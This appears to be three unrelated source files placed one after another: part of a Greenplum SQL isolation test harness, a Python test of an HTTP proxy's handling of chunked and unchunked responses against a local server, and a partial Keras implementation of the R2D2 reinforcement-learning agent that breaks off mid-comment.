#: either an integer indicating a unique session, or a dbid if followed
by U (for utility-mode connections). In 'U' mode, the dbid can
alternatively be an asterisk '*' to perform a utility-mode query on
the master and all primaries.
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session
U: connect in utility mode to dbid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
a transaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For example, the following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For example:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = 'DML';
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file, runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
(options, args) = parser.parse_args()
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout)
|
http_1_0_server_http_client_behaviors_test.py
|
import test_util.proxy
import test_util.runner
import http.client
import http.server
import threading
import test_util.thread_safe_counter
import random
import time
if __name__ == "__main__":
request_counter = test_util.thread_safe_counter.Counter()
# This is an HTTP 1.0 server that doesn't support persistent connections
class Server(http.server.BaseHTTPRequestHandler):
disable_nagle_algorithm = True
def do_HEAD(self):
request_counter.increment()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", 5)
self.end_headers()
def write_chunked(self, what, padded):
remaining = what
while len(remaining) > 0:
chunk_length = random.randint(1, len(remaining))
self.write_chunk(remaining[:chunk_length], padded)
remaining = remaining[chunk_length:]
self.write_chunk(remaining, padded)
def write_chunk(self, chunk, padded):
if padded and random.randint(0, 1) == 0:
self.wfile.write(b"0")
self.wfile.flush()
time.sleep(0.001)
padding = random.randint(0, 5) if padded else 0
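# Each chunk follows the HTTP/1.1 chunked transfer coding: a hex chunk size,
# CRLF, the chunk data, CRLF. When padded, the size field is zero-padded (and
# occasionally split across writes with short sleeps) to exercise clients that
# must parse chunk headers arriving in multiple packets.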
self.wfile.write(((b"%%0%dx\r\n") % padding) % len(chunk) + chunk + b"\r\n")
self.wfile.flush()
if random.randint(0, 1) == 0:
time.sleep(0.001)
def do_POST(self):
request_counter.increment()
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length) if content_length > 0 else ""
body_length = len(body)
if self.path == "/body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"<h1>body_200 %d</h1>" % body_length)
elif self.path == "/body_200_length/":
self.send_response(200)
response = b"<h1>body_200 %d</h1>" % body_length
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(len(response)))
self.end_headers()
self.wfile.write(response)
elif self.path == "/body_200_chunked/":
self.send_response(200)
response = b"<h1>body_200 %d</h1>" % body_length
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=False)
elif self.path == "/body_200_chunked_padded_length/":
self.send_response(200)
response = b"<h1>body_200 %d</h1>" % body_length
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=True)
elif self.path == "/no_body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
elif self.path == "/no_body_200_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", "0")
self.end_headers()
def do_GET(self):
request_counter.increment()
if self.path == "/body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"<h1>body_200</h1>")
elif self.path == "/body_200_length/":
self.send_response(200)
response = b"<h1>body_200</h1>"
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(len(response)))
self.end_headers()
self.wfile.write(response)
elif self.path == "/body_200_chunked/":
self.send_response(200)
response = b"<h1>body_200</h1>"
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=False)
elif self.path == "/body_200_chunked_padded_length/":
self.send_response(200)
response = b"<h1>body_200</h1>"
self.send_header("Content-type", "text/html")
self.send_header("Transfer-Encoding", "chunked")
self.end_headers()
self.write_chunked(response, padded=True)
elif self.path == "/no_body_200_no_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
elif self.path == "/no_body_200_length/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", "0")
self.end_headers()
server = http.server.HTTPServer(("localhost", 0), Server)
server_port = server.server_address[1]
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True # thread dies with the program
thread.start()
expected_request_counter = 0
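# test_requests drives one request through the proxy under test and checks, in
# order, the callback event lines the proxy writes to its queue
# (request_pre_body, request_body_some_last, response_pre_body,
# response_body_some_last, response_finished), then compares the response body
# and the upstream request counter against what the selected behavior implies.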
def test_requests(proxy_port, behavior, send_immediately, method, suffix):
global expected_request_counter
http_connection = http.client.HTTPConnection("127.0.0.1", proxy_port)
http_connection.connect()
test_util.runner.get_line_from_queue_and_assert(queue, "connection\n")
url = "http://localhost:%d/%s/" % (server_port, suffix)
if method == "POST":
# We often want to test short payloads that will fit in the same
# packet as the pre-body.
body_length = random.choice(
[random.randint(0, 1), random.randint(2, 100000)]
)
body = "a" * body_length
else:
body_length = None
body = None
http_connection.request(method, url, body)
stream = (
"none"
if behavior.startswith("buffer_request_")
or behavior
in {
"request_body_last_generates_response_with_body",
"request_body_last_generates_response_without_body",
}
else (
"downstream"
if behavior
in {
"request_pre_body_generates_response_with_body",
"request_pre_body_generates_response_without_body",
}
else "upstream"
)
)
if (
behavior.endswith("default")
or behavior.endswith("response_pre_body_generates_response_with_body")
or behavior.endswith("response_pre_body_generates_response_without_body")
or behavior.endswith("response_pre_body_prepend")
or behavior.endswith("response_body_prepend")
or behavior.endswith("response_body_append")
):
expected_request_counter += 1
test_util.runner.get_line_from_queue_and_assert(
queue, "request_pre_body /%s/ %s\n" % (suffix, stream)
)
test_util.runner.get_line_from_queue_and_assert(
queue, "request_body_some_last /%s/\n" % suffix
)
if (
behavior.endswith("default")
or behavior.endswith("response_pre_body_generates_response_with_body")
or behavior.endswith("response_pre_body_generates_response_without_body")
or behavior.endswith("response_pre_body_prepend")
or behavior.endswith("response_body_prepend")
or behavior.endswith("response_body_append")
):
stream = "none" if False else "downstream"
test_util.runner.get_line_from_queue_and_assert(
queue, "response_pre_body /%s/ 200 %s\n" % (suffix, stream)
)
test_util.runner.get_line_from_queue_and_assert(
queue, "response_body_some_last /%s/\n" % suffix
)
test_util.runner.get_line_from_queue_and_assert(queue, "response_finished\n")
response = http_connection.getresponse()
if method == "HEAD":
expected_body = b""
elif (
behavior
in {
"request_pre_body_generates_response_with_body",
"request_body_last_generates_response_with_body",
}
or behavior.endswith("response_pre_body_generates_response_with_body")
):
expected_body = b"<h1>%s</h1>" % str.encode(behavior)
else:
if (
suffix
in {
"no_body_200_no_length",
"no_body_200_length",
}
or behavior
in {
"request_pre_body_generates_response_without_body",
"request_body_last_generates_response_without_body",
}
or behavior.endswith(
"response_pre_body_generates_response_without_body"
)
):
expected_body = b""
else:
expected_body = (
b"<h1>body_200</h1>"
if body_length is None
else (b"<h1>body_200 %d</h1>" % body_length)
)
if behavior.endswith("response_pre_body_prepend") or behavior.endswith(
"response_body_prepend"
):
expected_body = b"<h1>Pre body</h1>" + expected_body
elif behavior.endswith("response_body_append"):
expected_body += b"<h1>Post body</h1>"
read_body = response.read()
if behavior in {"body_200_chunked", "body_200_chunked_padded_length"}:
remaining_body = read_body
read_body = ""
while True:
carriage_return_index = remaining_body.index("\r")
chunk_length = int(remaining_body[:carriage_return_index], 16)
if chunk_length == 0:
break
read_body += remaining_body[
carriage_return_index + 2 : carriage_return_index + 2 + chunk_length
]
remaining_body = remaining_body[
carriage_return_index + 2 + chunk_length + 2
]
assert read_body == expected_body, "%s body %s doesn't match %s!" % (
url,
read_body,
expected_body,
)
http_connection.close()
assert expected_request_counter == request_counter.value(), (
"Unexpected request_count - expected %d was %d"
% (expected_request_counter, request_counter.value())
)
test_util.runner.get_line_from_queue_and_assert(queue, "connection_finished\n")
for behavior in [
"default",
"buffer_request_default",
"request_pre_body_generates_response_with_body",
"request_pre_body_generates_response_without_body",
"request_body_last_generates_response_with_body",
"request_body_last_generates_response_without_body",
"response_pre_body_generates_response_with_body",
"response_pre_body_generates_response_without_body",
"buffer_request_response_pre_body_generates_response_with_body",
"buffer_request_response_pre_body_generates_response_without_body",
"response_pre_body_prepend",
"response_body_prepend",
"response_body_append",
"buffer_request_response_pre_body_prepend",
"buffer_request_response_body_prepend",
"buffer_request_response_body_append",
]:
for send_immediately in [True, False]:
queue, proxy_process = test_util.runner.run(
"./tests-proxy/server/switch_callbacks_proxy",
[behavior, "immediately" if send_immediately else "collect"],
)
proxy_port = int(queue.get().strip())
for method in ["HEAD", "GET", "POST"]:
for suffix in [
"body_200_length",
"body_200_no_length",
"body_200_chunked",
"body_200_chunked_padded_length",
"no_body_200_length",
"no_body_200_no_length",
]:
test_requests(
proxy_port, behavior, send_immediately, method, suffix
)
proxy_process.kill()
|
r2d2.py
|
import tensorflow as tf
import rl
import rl.core
import keras
from keras.layers import *
from keras.models import Model
from keras.models import model_from_json
from keras import backend as K
import numpy as np
import multiprocessing as mp
import math
import os
import pickle
import enum
import time
import traceback
import ctypes
from .common import *
# Configuration for sharing the GPU across multiple processes
# https://qiita.com/studio_haneya/items/4dfaf2fb2ac44818e7e0
# https://github.com/tensorflow/tensorflow/issues/11812
for device in tf.config.experimental.list_physical_devices('GPU'):
tf.config.experimental.set_memory_growth(device, True)
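# set_memory_growth makes TensorFlow allocate GPU memory on demand instead of
# grabbing the whole device up front, so the learner and actor processes can
# share a single GPU.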
#---------------------------------------------------
# manager
#---------------------------------------------------
class R2D2():
def __init__(self,
# model-related
input_shape,
input_type,
nb_actions, # number of actions (output size)
remote_memory,
actors,
optimizer,
processor=None,
metrics=[],
image_model=None, # image model to use
input_sequence=4, # number of input frames
dense_units_num=512, # number of units in the Dense layers
enable_dueling_network=True, # enable the dueling network
dueling_network_type=DuelingNetwork.AVERAGE, # dueling network aggregation algorithm
lstm_type=LstmType.NONE, # LSTM mode
lstm_units_num=512, # number of units in the LSTM layer
lstm_ful_input_length=1, # input length for the stateful LSTM
batch_size=32, # batch_size
# learner-related
remote_memory_warmup_size=100, # number of warm-up steps used to fill the memory (no training yet)
target_model_update=500, # target network update interval
enable_double_dqn=True, # enable Double DQN
burnin_length=4, # burn-in length
priority_exponent=0.9, # eta used when computing the sequence priority
# actor-related
actor_model_sync_interval=500, # interval at which actors sync the model from the learner
gamma=0.99, # Q-learning discount factor
enable_rescaling=True, # enable value rescaling
rescaling_epsilon=0.001, # rescaling constant
reward_multisteps=3, # multistep reward
action_interval=1, # interval at which actions are selected
# misc
verbose=1,
):
#--- check
if lstm_type != LstmType.STATEFUL:
burnin_length = 0
assert remote_memory.capacity > batch_size, "Memory capacity must be larger than the batch size."
assert remote_memory_warmup_size > batch_size, "remote_memory_warmup_size must be larger than the batch size."
if image_model is None:
assert input_type == InputType.VALUES
else:
assert input_type == InputType.GRAY_2ch or input_type == InputType.GRAY_3ch or input_type == InputType.COLOR
# Constraints on image input
# When using an LSTM: images are passed in as (w, h, ch).
# When not using an LSTM:
# input_sequence == 1: any input type can be used.
# input_sequence != 1: only GRAY_2ch can be used.
if lstm_type == LstmType.NONE and input_sequence != 1:
assert (input_type == InputType.GRAY_2ch), "image input must be GRAY_2ch when lstm_type is NONE and input_sequence != 1."
#---
self.kwargs = {
"input_shape": input_shape,
"input_type": input_type,
"nb_actions": nb_actions,
"remote_memory": remote_memory,
"actors": actors,
"optimizer": optimizer,
"processor": processor,
"metrics": metrics,
"image_model": image_model,
"input_sequence": input_sequence,
"dense_units_num": dense_units_num,
"enable_dueling_network": enable_dueling_network,
"dueling_network_type": dueling_network_type,
"lstm_type": lstm_type,
"lstm_units_num": lstm_units_num,
"lstm_ful_input_length": lstm_ful_input_length,
"batch_size": batch_size,
"remote_memory_warmup_size": remote_memory_warmup_size,
"target_model_update": target_model_update,
"enable_double_dqn": enable_double_dqn,
"enable_rescaling": enable_rescaling,
"rescaling_epsilon": rescaling_epsilon,
"burnin_length": burnin_length,
"priority_exponent": priority_exponent,
"actor_model_sync_interval": actor_model_sync_interval,
"gamma": gamma,
"reward_multisteps": reward_multisteps,
"action_interval": action_interval,
"verbose": verbose,
}
self.learner_ps = None
self.actors_ps = []
def __del__(self):
if self.learner_ps is not None:
self.learner_ps.terminate()
for p in self.actors_ps:
p.terminate()
def train(self,
nb_trains,
manager_allocate="/device:CPU:0",
learner_allocate="/device:GPU:0",
callbacks=[],
):
# Check whether a GPU is available
# Reference: https://qiita.com/studio_haneya/items/4dfaf2fb2ac44818e7e0
if len(tf.config.experimental.list_physical_devices('GPU')) > 0:
self.enable_GPU = True
else:
self.enable_GPU = False
#--- init
self.kwargs["nb_trains"] = nb_trains
self.kwargs["callbacks"] = R2D2CallbackList(callbacks)
actor_num = len(self.kwargs["actors"])
learner_allocate = learner_allocate
verbose = self.kwargs["verbose"]
if self.enable_GPU:
self._train_allocate(manager_allocate, actor_num, learner_allocate, verbose)
else:
self._train(actor_num, learner_allocate, verbose)
def _train_allocate(self, allocate, *args):
with tf.device(allocate):
self._train(*args)
def _train(self, actor_num, learner_allocate, verbose):
# shared variables for inter-process communication
self.learner_end_signal = mp.Value(ctypes.c_bool, False)
self.is_learner_end = mp.Value(ctypes.c_bool, False)
self.train_count = mp.Value(ctypes.c_int, 0)
# queue for sending experiences
exp_q = mp.Queue()
weights_qs = []
self.is_actor_ends = []
for _ in range(actor_num):
# queue for sending model weights
weights_q = mp.Queue()
weights_qs.append(weights_q)
self.is_actor_ends.append(mp.Value(ctypes.c_bool, False))
self.kwargs["callbacks"].on_r2d2_train_begin()
t0 = time.time()
try:
# start the learner process
learner_args = (
self.kwargs,
exp_q,
weights_qs,
self.learner_end_signal,
self.is_learner_end,
self.train_count,
)
if self.enable_GPU:
learner_args = (learner_allocate,) + learner_args
self.learner_ps = mp.Process(target=learner_run_allocate, args=learner_args)
else:
self.learner_ps = mp.Process(target=learner_run, args=learner_args)
self.learner_ps.start()
# start the actor processes
self.actors_ps = []
for i in range(actor_num):
# args
actor_args = (
i,
self.kwargs,
exp_q,
weights_qs[i],
self.is_learner_end,
self.train_count,
self.is_actor_ends[i],
)
if self.enable_GPU:
actor = self.kwargs["actors"][i]
actor_args = (actor.allocate,) + actor_args
ps = mp.Process(target=actor_run_allocate, args=actor_args)
else:
ps = mp.Process(target=actor_run, args=actor_args)
self.actors_ps.append(ps)
ps.start()
# wait for termination
while True:
time.sleep(1) # polling time
# has the learner finished?
if self.is_learner_end.value:
break
# have all actors finished?
f = True
for is_actor_end in self.is_actor_ends:
if not is_actor_end.value:
f = False
break
if f:
break
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc())
if verbose > 0:
print("done, took {:.3f} seconds".format(time.time() - t0))
self.kwargs["callbacks"].on_r2d2_train_end()
# signal the learner to stop
self.learner_end_signal.value = True
# wait until the learner has stopped (with a timeout)
t0 = time.time()
while not self.is_learner_end.value:
if time.time() - t0 > 360: # timeout
if verbose > 0:
print("learner end timeout.")
break
time.sleep(1)
def createTestAgent(self, test_actor, learner_model_path):
return R2D2.createTestAgentStatic(self.kwargs, test_actor, learner_model_path)
@staticmethod
def createTestAgentStatic(manager_kwargs, test_actor, learner_model_path):
test_actor = ActorRunner(-1, manager_kwargs, test_actor(), None, None, None, None)
with open(learner_model_path, 'rb') as f:
d = pickle.load(f)
test_actor.model.set_weights(d["weights"])
return test_actor
#---------------------------------------------------
# create model
#---------------------------------------------------
def build_compile_model(kwargs):
input_shape = kwargs["input_shape"]
input_type = kwargs["input_type"]
image_model = kwargs["image_model"]
batch_size = kwargs["batch_size"]
input_sequence = kwargs["input_sequence"]
lstm_type = kwargs["lstm_type"]
lstm_units_num = kwargs["lstm_units_num"]
enable_dueling_network = kwargs["enable_dueling_network"]
dense_units_num = kwargs["dense_units_num"]
nb_actions = kwargs["nb_actions"]
dueling_network_type = kwargs["dueling_network_type"]
optimizer = kwargs["optimizer"]
metrics = kwargs["metrics"]
if input_type == InputType.VALUES:
if lstm_type != LstmType.STATEFUL:
c = input_ = Input(shape=(input_sequence,) + input_shape)
else:
c = input_ = Input(batch_shape=(batch_size, input_sequence) + input_shape)
elif input_type == InputType.GRAY_2ch:
if lstm_type != LstmType.STATEFUL:
c = input_ = Input(shape=(input_sequence,) + input_shape)
else:
c = input_ = Input(batch_shape=(batch_size, input_sequence) + input_shape)
else:
if lstm_type != LstmType.STATEFUL:
c = input_ = Input(shape=input_shape)
else:
c = input_ = Input(batch_shape=(batch_size, input_sequence) + input_shape)
if image_model is None:
# input not image
if lstm_type == LstmType.NONE:
c = Flatten()(c)
else:
c = TimeDistributed(Flatten())(c)
else:
# input image
if lstm_type == LstmType.NONE:
enable_lstm = False
if input_type == InputType.GRAY_2ch:
# (input_seq, w, h) ->(w, h, input_seq)
c = Permute((2, 3, 1))(c)
elif lstm_type == LstmType.STATELESS or lstm_type == LstmType.STATEFUL:
enable_lstm = True
if input_type == InputType.GRAY_2ch:
# (time steps, w, h) -> (time steps, w, h, ch)
c = Reshape((input_sequence, ) + input_shape + (1,) )(c)
else:
raise ValueError('lstm_type is not defined')
c = image_model.create_image_model(c, enable_lstm)
# lstm layer
if lstm_type == LstmType.STATELESS:
c = LSTM(lstm_units_num, name="lstm")(c)
elif lstm_type == LstmType.STATEFUL:
c = LSTM(lstm_units_num, stateful=True, name="lstm")(c)
# dueling network
if enable_dueling_network:
# value
v = Dense(dense_units_num, activation="relu")(c)
v = Dense(1, name="v")(v)
# advantage
adv = Dense(dense_units_num, activation='relu')(c)
adv = Dense(nb_actions, name="adv")(adv)
# concatenate the value and advantage streams
c = Concatenate()([v,adv])
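# The Lambda layers below implement the dueling aggregation, where column 0 of
# the concatenated tensor is V and the remaining columns are A:
#   Q(s,a) = V(s) + A(s,a) - mean_a' A(s,a')   (AVERAGE)
#   Q(s,a) = V(s) + A(s,a) - max_a'  A(s,a')   (MAX)
#   Q(s,a) = V(s) + A(s,a)                     (NAIVE)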
if dueling_network_type == DuelingNetwork.AVERAGE:
c = Lambda(lambda a: K.expand_dims(a[:, 0], -1) + a[:, 1:] - K.mean(a[:, 1:], axis=1, keepdims=True), output_shape=(nb_actions,))(c)
elif dueling_network_type == DuelingNetwork.MAX:
c = Lambda(lambda a: K.expand_dims(a[:, 0], -1) + a[:, 1:] - K.max(a[:, 1:], axis=1, keepdims=True), output_shape=(nb_actions,))(c)
elif dueling_network_type == DuelingNetwork.NAIVE:
c = Lambda(lambda a: K.expand_dims(a[:, 0], -1) + a[:, 1:], output_shape=(nb_actions,))(c)
else:
raise ValueError('dueling_network_type is not defined')
else:
c = Dense(dense_units_num, activation="relu")(c)
c = Dense(nb_actions, activation="linear", name="adv")(c)
model = Model(input_, c)
model.compile(loss=clipped_error_loss, optimizer=optimizer, metrics=metrics)
return model
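# A minimal sketch (not part of the original module) of the kwargs dict that
# build_compile_model() reads; the values shown are illustrative only:
#
#   kwargs = {
#       "input_shape": (4,), "input_type": InputType.VALUES, "image_model": None,
#       "batch_size": 32, "input_sequence": 4, "lstm_type": LstmType.NONE,
#       "lstm_units_num": 512, "enable_dueling_network": True,
#       "dense_units_num": 512, "nb_actions": 2,
#       "dueling_network_type": DuelingNetwork.AVERAGE,
#       "optimizer": keras.optimizers.Adam(), "metrics": [],
#   }
#   model = build_compile_model(kwargs)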
#---------------------------------------------------
# learner
#---------------------------------------------------
def learner_run_allocate(allocate, *args):
with tf.device(allocate):
learner_run(*args)
def learner_run(
kwargs,
exp_q,
weights_qs,
learner_end_signal,
is_learner_end,
train_count,
):
nb_trains = kwargs["nb_trains"]
verbose = kwargs["verbose"]
callbacks = kwargs["callbacks"]
try:
runner = LearnerRunner(kwargs, exp_q, weights_qs, train_count)
callbacks.on_r2d2_learner_begin(runner)
# the learner just keeps training
if verbose > 0:
print("Learner Start!")
while True:
callbacks.on_r2d2_learner_train_begin(runner)
runner.train()
callbacks.on_r2d2_learner_train_end(runner)
# check for termination
if learner_end_signal.value:
break
# check the train-count limit
if nb_trains > 0:
if runner.train_count.value > nb_trains:
break
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc())
try:
if verbose > 0:
print("Learning End. Train Count:{}".format(runner.train_count.value))
callbacks.on_r2d2_learner_end(runner)
except Exception:
print(traceback.format_exc())
is_learner_end.value = True
class LearnerRunner():
def __init__(self,
kwargs,
exp_q,
weights_qs,
train_count,
):
self.exp_q = exp_q
self.weights_qs = weights_qs
self.kwargs = kwargs
self.memory = kwargs["remote_memory"]
self.memory_warmup_size = kwargs["remote_memory_warmup_size"]
self.gamma = kwargs["gamma"]
self.batch_size = kwargs["batch_size"]
self.enable_double_dqn = kwargs["enable_double_dqn"]
self.target_model_update = kwargs["target_model_update"]
self.input_sequence = kwargs["input_sequence"]
self.lstm_type = kwargs["lstm_type"]
self.burnin_length = kwargs["burnin_length"]
self.priority_exponent = kwargs["priority_exponent"]
self.actor_model_sync_interval = kwargs["actor_model_sync_interval"]
self.reward_multisteps = kwargs["reward_multisteps"]
self.lstm_ful_input_length = kwargs["lstm_ful_input_length"]
self.actors_num = len(kwargs["actors"])
# train_count
self.train_count = train_count
# model create
self.model = build_compile_model(kwargs)
self.target_model = build_compile_model(kwargs)
if self.lstm_type == LstmType.STATEFUL:
self.lstm = self.model.get_layer("lstm")
self.target_lstm = self.target_model.get_layer("lstm")
def train(self):
# periodically send the current weights to the actors
if self.train_count.value % self.actor_model_sync_interval == 0:
weights = self.model.get_weights()
for q in self.weights_qs:
# send
q.put(weights)
# add any received experiences to the remote memory
for _ in range(self.exp_q.qsize()):
exp = self.exp_q.get(timeout=1)
self.memory.add(exp, exp[4])
# do not train until the remote memory holds enough samples
if len(self.memory) <= self.memory_warmup_size:
return
# sample a prioritized batch from memory
(indexes, batchs, weights) = self.memory.sample(self.batch_size, self.train_count.value)
# training (factored into functions because it is long)
if self.lstm_type == LstmType.STATEFUL:
self.train_model_ful(indexes, batchs, weights)
else:
self.train_model(indexes, batchs, weights)
self.train_count.value += 1 # only the learner writes this, so no lock is needed
# update the target network
if self.train_count.value % self.target_model_update == 0:
self.target_model.set_weights(self.model.get_weights())
# regular (non-stateful) training
def train_model(self, indexes, batchs, weights):
state0_batch = []
action_batch = []
reward_batch = []
state1_batch = []
for batch in batchs:
state0_batch.append(batch[0])
action_batch.append(batch[1])
reward_batch.append(batch[2])
state1_batch.append(batch[3])
state0_batch = np.asarray(state0_batch)
state1_batch = np.asarray(state1_batch)
# current Q-network output for the states being updated (Q network)
state0_qvals = self.model.predict(state0_batch, self.batch_size)
if self.enable_double_dqn:
# get Q-values from both the online network and the target network
state1_qvals_model = self.model.predict(state1_batch, self.batch_size)
state1_qvals_target = self.target_model.predict(state1_batch, self.batch_size)
else:
# next-state Q-values from the target network
state1_qvals_target = self.target_model.predict(state1_batch, self.batch_size)
for i in range(self.batch_size):
if self.enable_double_dqn:
action = state1_qvals_model[i].argmax() # select the action with the online model
maxq = state1_qvals_target[i][action] # evaluate its Q-value with the target model
else:
maxq = state1_qvals_target[i].max()
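# n-step TD target with n = reward_multisteps:
#   y = R_multistep + gamma**n * max_a Q_target(s_{t+n}, a)
#   td_error = y - Q(s_t, a_t)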
# compute the priority
q0 = state0_qvals[i][action_batch[i]]
td_error = reward_batch[i] + (self.gamma ** self.reward_multisteps) * maxq - q0
priority = abs(td_error)
# update the Q-value
state0_qvals[i][action_batch[i]] += td_error * weights[i]
# update the priority
self.memory.update(indexes[i], batchs[i], priority)
# train
self.model.train_on_batch(state0_batch, state0_qvals)
# training for the stateful LSTM
def train_model_ful(self, indexes, batchs, weights):
hidden_s0 = []
hidden_s1 = []
for batch in batchs:
# there is one per batch element but they are all identical, so take index 0
hidden_s0.append(batch[3][0][0])
hidden_s1.append(batch[3][1][0])
hidden_states = [np.asarray(hidden_s0), np.asarray(hidden_s1)]
# init hidden_state
self.lstm.reset_states(hidden_states)
self.target_lstm.reset_states(hidden_states)
# predict
hidden_states_arr = []
if self.burnin_length == 0:
hidden_states_arr.append(hidden_states)
state_batch_arr = []
model_qvals_arr = []
target_qvals_arr = []
prioritys = [ [] for _ in range(self.batch_size)]
for seq_i in range(self.burnin_length + self.reward_multisteps + self.lstm_ful_input_length):
# state
state_batch = [ batch[0][seq_i] for batch in batchs ]
state_batch = np.asarray(state_batch)
# update the hidden state and obtain the Q-values
model_qvals = self.model.predict(state_batch, self.batch_size)
target_qvals = self.target_model.predict(state_batch, self.batch_size)
# burnin-1
if seq_i < self.burnin_length-1:
continue
hidden_states_arr.append([K.get_value(self.lstm.states[0]), K.get_value(self.lstm.states[1])])
# burnin
if seq_i < self.burnin_length:
continue
state_batch_arr.append(state_batch)
model_qvals_arr.append(model_qvals)
target_qvals_arr.append(target_qvals)
# train
for seq_i in range(self.lstm_ful_input_length):
# Q-values for state0 (reward_multisteps steps earlier)
state0_qvals = model_qvals_arr[seq_i]
# batch
for batch_i in range(self.batch_size):
# maxq
if self.enable_double_dqn:
action = model_qvals_arr[seq_i+self.reward_multisteps][batch_i].argmax() # select the action with the online model
maxq = target_qvals_arr[seq_i+self.reward_multisteps][batch_i][action] # evaluate its Q-value with the target model
else:
maxq = target_qvals_arr[seq_i+self.reward_multisteps][batch_i].max()
# priority
batch_action = batchs[batch_i][1][seq_i]
q0 = state0_qvals[batch_i][batch_action]
reward = batchs[batch_i][2][seq_i]
td_error = reward + (self.gamma ** self.reward_multisteps) * maxq - q0
priority = abs(td_error)
prioritys[batch_i].append(priority)
# update the Q-value
state0_qvals[batch_i][batch_action] += td_error * weights[batch_i]
# train
self.lstm.reset_states(hidden_states_arr[seq_i])
self.model.train_on_batch(state_batch_arr[seq_i], state0_qvals)
#--- priority update
for batch_i, batch in enumerate(batchs):
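# sequence priority mixes max and mean absolute TD errors:
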